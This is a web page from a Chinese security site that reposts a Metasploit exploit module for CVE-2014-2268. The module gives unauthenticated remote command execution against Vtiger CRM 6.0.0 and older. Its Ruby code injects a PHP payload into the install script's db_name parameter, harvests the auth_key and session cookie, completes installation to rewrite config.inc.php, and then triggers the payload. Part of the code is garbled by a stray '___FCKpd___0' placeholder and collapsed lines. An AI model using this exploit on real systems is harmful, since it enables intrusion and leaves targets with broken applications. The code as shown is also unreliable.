首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Vtiger Install Unauthenticated Remote Command Execution
来源:metasploit.com 作者:Borgeaud 发布时间:2014-04-09  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  # Application database configuration is overwritten
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Vtiger Install Unauthenticated Remote Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability in the
        Vtiger install script. This module is set to ManualRanking due to this
        module overwriting the target database configuration, which may result in
        a broken web app, and you may not be able to get a session again.
      },
      'Author'         =>
        [
          'Jonathan Borgeaud < research[at]navixia.com >' # Navixia Research Team
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-2268' ],
          [ 'URL', 'https://www.navixia.com/blog/entry/navixia-find-critical-vulnerabilities-in-vtiger-crm-cve-2014-2268-cve-2014-2269.html'],
          [ 'URL', 'http://vtiger-crm.2324883.n4.nabble.com/Vtigercrm-developers-IMP-forgot-password-and-re-installation-security-fix-tt9786.html'],

        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Payload'        =>
        {
          'Space'       => 4000,
          'BadChars'    => "#",
          'DisableNops' => true,
          'Keys'        => ['php']
        },
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Vtiger 6.0.0 or older', { }]],
      'DisclosureDate' => 'Mar 5 2014',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Vtiger', '/'])
        ], self.class)
  end

  def exploit
    print_status("Injecting payload...")
    rand_arg = Rex::Text.rand_text_hex(10)
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
      'headers'  => {'X-Requested-With' => rand_text_alpha(5)},
      'vars_get' => {
          'module'  => 'Install',
          'view'    => 'Index',
          'mode'    => 'Step5',
          'db_name' => "127.0.0.1'; if(isset(
___FCKpd___0
GET['#{rand_arg}'])){ #{payload.encoded} } // " }}) # Check timeout if not res print_error("Request timed out, please try again") return end if res.body =~ /name="auth_key"\s+value=".*?((?:[a-z0-9]*))"/i authkey = $1 phpsessid = res.get_cookies if authkey.blank? print_error("No AuthKey found") return elsif phpsessid.blank? print_error("No PHP Session ID found") return end print_status("Retrieved Authkey : #{authkey}") print_status("Retrieved PHPSESSID : #{phpsessid}") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'headers' => {'X-Requested-With' => rand_text_alpha(5)}, 'cookie' => phpsessid, 'vars_get' => { 'module' => 'Install', 'view' => 'Index', 'mode' => 'Step7', 'auth_key' => authkey } }) print_status("Executing payload...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'config.inc.php'), 'vars_get' => { rand_arg => '1' } }) else print_error("No auth_key pattern found") end end end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenSSL TLS Heartbeat Extensio
·Sun Java Runtime Environment 1
·BlazeDVD Pro Player 6.1 - Stac
·OpenSSL 1.0.1f TLS Heartbeat E
·WinRAR Filename Spoofing
·MS14-017 Microsoft Word RTF Ob
·Fritz!Box Webcm Unauthenticate
·Heartbleed TLS/DTLS Informatio
·MacOSX 10.9.2/XNU HFS Hard Lin
·Sophos Web Protection Applianc
·Google Voice Private/Unknown N
·OpenSSL Heartbeat (Heartbleed)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved